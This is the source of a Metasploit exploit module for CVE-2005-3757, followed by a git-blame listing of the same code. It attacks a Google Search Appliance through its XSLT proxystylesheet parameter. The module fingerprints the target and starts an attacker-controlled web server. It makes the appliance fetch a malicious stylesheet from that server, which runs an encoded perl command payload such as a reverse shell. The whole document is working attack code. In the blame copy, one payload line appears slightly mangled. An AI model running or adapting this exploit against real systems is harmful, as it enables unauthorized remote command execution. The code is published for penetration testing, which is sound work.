modules/exploits/unix/webapp/google_proxystylesheet_exec.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Google Appliance ProxyStyleSheet Command Execution',
      'Description'    => %q{
        This module exploits a feature in the Saxon XSLT parser used by
      the Google Search Appliance. This feature allows for arbitrary
      java methods to be called. Google released a patch and advisory to
      their client base in August of 2005 (GA-2005-08-m). The target appliance
      must be able to connect back to your machine for this exploit to work.
      },
      'Author'         => [ 'hdm' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2005-3757'],
          ['OSVDB', '20981'],
          ['BID', '15509'],
        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          'DisableNops' => true,
          'Space'       => 4000,
          'Compat'      =>
            {
              'PayloadType' => 'cmd cmd_bash',
              'RequiredCmd' => 'generic perl bash-tcp telnet netcat netcat-e',
            }
        },
      'Platform'       => 'unix',
      'Arch'           => ARCH_CMD,
      'Targets'        => [[ 'Automatic', { }]],
      'DisclosureDate' => '2005-08-16',
      'Stance'         => Msf::Exploit::Stance::Aggressive,
      'DefaultTarget' => 0))
  end

  # Handle incoming requests from the appliance
  def on_request_uri(cli, request)

    print_status("Handling new incoming HTTP request...")

    exec_str = '/usr/bin/perl -e system(pack(qq{H*},qq{' + payload.encoded.unpack("H*")[0] + '}))'
    data = @xml_data.gsub(/:x:MSF:x:/, exec_str)
    send_response(cli, data)
  end

  def autofilter
    true
  end

  def check
    res = send_request_cgi({
      'uri'      => '/search',
      'vars_get' =>
      {
        'client'          => rand_text_alpha(rand(15)+1),
        'site'            => rand_text_alpha(rand(15)+1),
        'output'          => 'xml_no_dtd',
        'q'               => rand_text_alpha(rand(15)+1),
        'proxystylesheet' => 'http://' + rand_text_alpha(rand(15)+1) + '/'
      }
    }, 10)

    if (res and res.body =~ /cannot be resolved to an ip address/)
      vprint_status("This system appears to be vulnerable")
      return Exploit::CheckCode::Appears
    end

    if (res and res.body =~ /ERROR: Unable to fetch the stylesheet/)
      vprint_status("This system appears to be patched")
    end

    return Exploit::CheckCode::Safe
  end


  def exploit

    # load the xml data
    path = File.join(Msf::Config.data_directory, "exploits", "google_proxystylesheet.xml")
    fd = File.open(path, "rb")
    @xml_data = fd.read(fd.stat.size)
    fd.close

    print_status("Obtaining the appliance site and client IDs...")
    # Send a HTTP/1.0 request to learn the site configuration
    res = send_request_raw({
      'uri'     => '/',
      'version' => '1.0'
    }, 10)

    if !(res and res['location'] and res['location'] =~ /site=/)
      print_status("Could not read the location header: #{res.code} #{res.message}")
      return
    end

    m = res['location'].match(/site=([^\&]+)\&.*client=([^\&]+)\&/im)
    if !(m and m[1] and m[2])
      print_status("Invalid location header: #{res['location']}")
      return
    end

    print_status("Starting up our web service on http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{resource_uri}...")
    start_service

    print_status("Requesting a search using our custom XSLT...")
    res = send_request_cgi({
      'uri'      => '/search',
      'vars_get' =>
      {
        'client'          => m[2],
        'site'            => m[1],
        'output'          => 'xml_no_dtd',
        'q'               => rand_text_alpha(rand(15)+1),
        'proxystylesheet' => "http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{resource_uri}/style.xml",
        'proxyreload'     => '1'
      }
    }, 25)

    if (res)
      print_status("The server returned: #{res.code} #{res.message}")
      print_status("Waiting on the payload to execute...")
      select(nil,nil,nil,20)
    else
      print_status("No response from the server")
    end
  end
end
Adding an Id tag and a standard header to all modules 2007-02-18 00:10:39 +00:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Adding an Id tag and a standard header to all modules 2007-02-18 00:10:39 +00:00			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Exploit::Remote`
add ranking to every exploit module, pfew! 2009-12-06 05:50:37 +00:00			`Rank = ExcellentRanking`
This massive commit changes the metasploit 3 module format. The new syntax allows for greater scalability and future improvements to the metasploit module loader. This change also makes it easier for users to add new modules, since the class name no longer needs to match the directory structure. 2008-10-02 05:23:59 +00:00			`include Msf::Exploit::Remote::HttpClient`
			`include Msf::Exploit::Remote::HttpServer`
Retab modules 2013-08-30 16:28:54 -05:00
Accessing res['header'] is now case insensitive for HTTP responses 2007-01-05 05:22:39 +00:00			`def initialize(info = {})`
try not to repeatedly load static files - see #694 2010-01-19 19:12:42 +00:00			`super(update_info(info,`
Accessing res['header'] is now case insensitive for HTTP responses 2007-01-05 05:22:39 +00:00			`'Name' => 'Google Appliance ProxyStyleSheet Command Execution',`
			`'Description' => %q{`
			`This module exploits a feature in the Saxon XSLT parser used by`
			`the Google Search Appliance. This feature allows for arbitrary`
try not to repeatedly load static files - see #694 2010-01-19 19:12:42 +00:00			`java methods to be called. Google released a patch and advisory to`
Accessing res['header'] is now case insensitive for HTTP responses 2007-01-05 05:22:39 +00:00			`their client base in August of 2005 (GA-2005-08-m). The target appliance`
try not to repeatedly load static files - see #694 2010-01-19 19:12:42 +00:00			`must be able to connect back to your machine for this exploit to work.`
Accessing res['header'] is now case insensitive for HTTP responses 2007-01-05 05:22:39 +00:00			`},`
Fix #53 , use Author, not Authors 2007-03-12 01:08:18 +00:00			`'Author' => [ 'hdm' ],`
Accessing res['header'] is now case insensitive for HTTP responses 2007-01-05 05:22:39 +00:00			`'License' => MSF_LICENSE,`
			`'References' =>`
			`[`
Massive OSVDB reference update from Steve Tornio. 2009-06-07 20:20:42 +00:00			`['CVE', '2005-3757'],`
Revert "Land #6812 , remove broken OSVDB references" 2016-07-15 12:00:31 -05:00			`['OSVDB', '20981'],`
Reference updates 2007-01-05 14:44:09 +00:00			`['BID', '15509'],`
Accessing res['header'] is now case insensitive for HTTP responses 2007-01-05 05:22:39 +00:00			`],`
			`'Privileged' => false,`
			`'Payload' =>`
			`{`
			`'DisableNops' => true,`
			`'Space' => 4000,`
Added a new set of match flags for cmd injection exploits (RequiredCmds). This reduces the number of 'bad' payloads listed for explot modules. A good example is disabling the netcat -e payloads for old Solaris exploits 2009-07-21 15:20:35 +00:00			`'Compat' =>`
			`{`
Fix #5659 : Update CMD exploits payload compatibility options 2015-08-10 17:12:59 -05:00			`'PayloadType' => 'cmd cmd_bash',`
			`'RequiredCmd' => 'generic perl bash-tcp telnet netcat netcat-e',`
Added a new set of match flags for cmd injection exploits (RequiredCmds). This reduces the number of 'bad' payloads listed for explot modules. A good example is disabling the netcat -e payloads for old Solaris exploits 2009-07-21 15:20:35 +00:00			`}`
try not to repeatedly load static files - see #694 2010-01-19 19:12:42 +00:00			`},`
Accessing res['header'] is now case insensitive for HTTP responses 2007-01-05 05:22:39 +00:00			`'Platform' => 'unix',`
			`'Arch' => ARCH_CMD,`
			`'Targets' => [[ 'Automatic', { }]],`
Convert disclosure dates to iso8601 2020-10-02 17:38:06 +01:00			`'DisclosureDate' => '2005-08-16',`
Accessing res['header'] is now case insensitive for HTTP responses 2007-01-05 05:22:39 +00:00			`'Stance' => Msf::Exploit::Stance::Aggressive,`
			`'DefaultTarget' => 0))`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Accessing res['header'] is now case insensitive for HTTP responses 2007-01-05 05:22:39 +00:00			`# Handle incoming requests from the appliance`
			`def on_request_uri(cli, request)`
Retab modules 2013-08-30 16:28:54 -05:00
Accessing res['header'] is now case insensitive for HTTP responses 2007-01-05 05:22:39 +00:00			`print_status("Handling new incoming HTTP request...")`
Retab modules 2013-08-30 16:28:54 -05:00
Accessing res['header'] is now case insensitive for HTTP responses 2007-01-05 05:22:39 +00:00			`exec_str = '/usr/bin/perl -e system(pack(qq{H},qq{' + payload.encoded.unpack("H")[0] + '}))'`
try not to repeatedly load static files - see #694 2010-01-19 19:12:42 +00:00			`data = @xml_data.gsub(/:x:MSF:x:/, exec_str)`
Accessing res['header'] is now case insensitive for HTTP responses 2007-01-05 05:22:39 +00:00			`send_response(cli, data)`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Fix autofilter values for aggressive modules 2015-10-13 15:56:18 -07:00			`def autofilter`
			`true`
			`end`

Accessing res['header'] is now case insensitive for HTTP responses 2007-01-05 05:22:39 +00:00			`def check`
			`res = send_request_cgi({`
			`'uri' => '/search',`
try not to repeatedly load static files - see #694 2010-01-19 19:12:42 +00:00			`'vars_get' =>`
Accessing res['header'] is now case insensitive for HTTP responses 2007-01-05 05:22:39 +00:00			`{`
			`'client' => rand_text_alpha(rand(15)+1),`
			`'site' => rand_text_alpha(rand(15)+1),`
			`'output' => 'xml_no_dtd',`
			`'q' => rand_text_alpha(rand(15)+1),`
			`'proxystylesheet' => 'http://' + rand_text_alpha(rand(15)+1) + '/'`
			`}`
			`}, 10)`
Retab modules 2013-08-30 16:28:54 -05:00
Accessing res['header'] is now case insensitive for HTTP responses 2007-01-05 05:22:39 +00:00			`if (res and res.body =~ /cannot be resolved to an ip address/)`
Saving progress 2014-01-21 13:03:36 -06:00			`vprint_status("This system appears to be vulnerable")`
			`return Exploit::CheckCode::Appears`
Accessing res['header'] is now case insensitive for HTTP responses 2007-01-05 05:22:39 +00:00			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Accessing res['header'] is now case insensitive for HTTP responses 2007-01-05 05:22:39 +00:00			`if (res and res.body =~ /ERROR: Unable to fetch the stylesheet/)`
Saving progress 2014-01-21 13:03:36 -06:00			`vprint_status("This system appears to be patched")`
Accessing res['header'] is now case insensitive for HTTP responses 2007-01-05 05:22:39 +00:00			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Accessing res['header'] is now case insensitive for HTTP responses 2007-01-05 05:22:39 +00:00			`return Exploit::CheckCode::Safe`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00

Accessing res['header'] is now case insensitive for HTTP responses 2007-01-05 05:22:39 +00:00			`def exploit`
Retab modules 2013-08-30 16:28:54 -05:00
try not to repeatedly load static files - see #694 2010-01-19 19:12:42 +00:00			`# load the xml data`
Find and replace 2013-09-26 20:34:48 +01:00			`path = File.join(Msf::Config.data_directory, "exploits", "google_proxystylesheet.xml")`
ensure binary mode when opening files, whitespace fixes 2010-07-01 23:33:07 +00:00			`fd = File.open(path, "rb")`
try not to repeatedly load static files - see #694 2010-01-19 19:12:42 +00:00			`@xml_data = fd.read(fd.stat.size)`
			`fd.close`
Retab modules 2013-08-30 16:28:54 -05:00
Accessing res['header'] is now case insensitive for HTTP responses 2007-01-05 05:22:39 +00:00			`print_status("Obtaining the appliance site and client IDs...")`
			`# Send a HTTP/1.0 request to learn the site configuration`
			`res = send_request_raw({`
			`'uri' => '/',`
			`'version' => '1.0'`
			`}, 10)`
Retab modules 2013-08-30 16:28:54 -05:00
Another large number of warnings fixed by Yoann Guillot 2009-10-25 17:18:23 +00:00			`if !(res and res['location'] and res['location'] =~ /site=/)`
Accessing res['header'] is now case insensitive for HTTP responses 2007-01-05 05:22:39 +00:00			`print_status("Could not read the location header: #{res.code} #{res.message}")`
			`return`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Accessing res['header'] is now case insensitive for HTTP responses 2007-01-05 05:22:39 +00:00			`m = res['location'].match(/site=([^\&]+)\&.*client=([^\&]+)\&/im)`
Another large number of warnings fixed by Yoann Guillot 2009-10-25 17:18:23 +00:00			`if !(m and m[1] and m[2])`
Accessing res['header'] is now case insensitive for HTTP responses 2007-01-05 05:22:39 +00:00			`print_status("Invalid location header: #{res['location']}")`
try not to repeatedly load static files - see #694 2010-01-19 19:12:42 +00:00			`return`
Accessing res['header'] is now case insensitive for HTTP responses 2007-01-05 05:22:39 +00:00			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Accessing res['header'] is now case insensitive for HTTP responses 2007-01-05 05:22:39 +00:00			`print_status("Starting up our web service on http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{resource_uri}...")`
			`start_service`
Retab modules 2013-08-30 16:28:54 -05:00
Removed redundant cleanup calls which exploit_driver will call anyway 2022-03-11 12:08:51 +11:00			`print_status("Requesting a search using our custom XSLT...")`
			`res = send_request_cgi({`
			`'uri' => '/search',`
			`'vars_get' =>`
			`{`
			`'client' => m[2],`
			`'site' => m[1],`
			`'output' => 'xml_no_dtd',`
			`'q' => rand_text_alpha(rand(15)+1),`
			`'proxystylesheet' => "http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{resource_uri}/style.xml",`
			`'proxyreload' => '1'`
			`}`
			`}, 25)`

			`if (res)`
			`print_status("The server returned: #{res.code} #{res.message}")`
			`print_status("Waiting on the payload to execute...")`
			`select(nil,nil,nil,20)`
			`else`
			`print_status("No response from the server")`
Accessing res['header'] is now case insensitive for HTTP responses 2007-01-05 05:22:39 +00:00			`end`
			`end`
Massive OSVDB reference update from Steve Tornio. 2009-06-07 20:20:42 +00:00			`end`